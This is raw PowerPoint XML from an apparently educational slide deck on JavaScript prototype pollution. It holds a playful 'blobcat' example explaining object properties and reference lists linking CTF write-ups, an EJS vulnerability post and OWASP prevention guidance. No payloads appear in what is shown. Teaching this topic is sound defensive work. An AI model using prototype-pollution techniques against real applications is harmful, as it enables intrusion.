Target="https://github.com/hughsk/flat/issues/10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pugjs.org/language/code.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/writeup/28035" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.huli.tw/2023/06/22/ejs-render-vulnerability-ctf/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20201109113214/https:/blog.p6.is/AST-Injection/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide71.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/writeup/28035"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hyperlink" Target="https://ctftime.org/writeups?hidden-tags=prototype-pollution"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hyperlink" Target="https://portswigger.net/web-security/prototype-pollution/preventing#sanitizing-property-keys"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https://developer.mozilla.org/docs/Web/JavaScript/Data_structure"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hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof"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Map"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s://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Set"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Set" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Map"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null-prototype_objects" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Object_initializer#prototype_setter" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#instance_methods"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developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/seal" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain#implicit_constructors_of_literals"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cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag"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developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto#browser_compatibility"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mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof"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eveloper.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof#typeof_nul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gist.github.com/matthiasak/c3c9c40d0f98ca91def1" TargetMode="Externa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hyperlink" Target="https://docs.python.org/3/library/stdtypes.html#instance.__class__"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ctftime.org/writeup/36991"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ctftime.org/writeups?hidden-tags=prototype-pollution" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DuckOfDisorder/BlobCat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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="1322450"/>
            <a:ext cx="7688100" cy="1664700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript prototype pollution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Subtitle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC690878-5504-6076-72BE-AD7D6C5E6729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>"quote" × </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>polyipseity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>2024-05-10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8536302" y="4749851"/>
            <a:ext cx="548700" cy="393600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5818FBBC-3474-0493-435A-A169DAA92537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6616176" y="1321276"/>
            <a:ext cx="1799162" cy="1799162"/>
            <a:chOff x="6616176" y="1321276"/>
            <a:chExt cx="1799162" cy="1799162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Graphic 16" descr="JavaScript logo">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E8B34B0-C674-C6B9-8BCF-52935D6A21AC}"/>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6176" y="1321276"/>
              <a:ext cx="1799162" cy="1799162"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="Picture 1" descr="A yellow cat with a wrench&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0745C7-493C-C73C-759C-84053DD9B6B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7515757" y="1321276"/>
              <a:ext cx="795908" cy="795908"/>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Object (including function) is the only type that can have properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>What is a property?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>personality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> is holding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>knife</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> on its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>hand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>!!!!!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = {personality: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"evil"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, hand: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLs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434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>personality</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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'evil'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hand</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highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highligh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 }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Above is the syntax for creating an object and putting it into a variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> has 2 properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>One property has the string name/key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>personality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"evil"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The other property has the string name/key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>knife"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK"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10" name="Picture 9" descr="A yellow cat with a knife">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1798E833-E74A-245D-C79A-1D0D8054EAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737028" y="2091856"/>
            <a:ext cx="1449012" cy="1449012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C396DC-351A-09A5-5890-4784133F3147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5466241" y="1799468"/>
            <a:ext cx="4522320" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>AHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1859628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2"/>
              </a:rPr>
              <a:t>https://blog.huli.tw/2023/06/22/ejs-render-vulnerability-ctf/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeup/28035</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeup/36991</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeup/38612</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeup/39045</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeups?hidden-tags=prototype-pollution</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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12890573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 2</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2"/>
              </a:rPr>
              <a:t>https://curl.se/docs/manpage.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Data_structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain#implicit_constructors_of_literals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, see the warning section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Functions/get</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Functions/set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
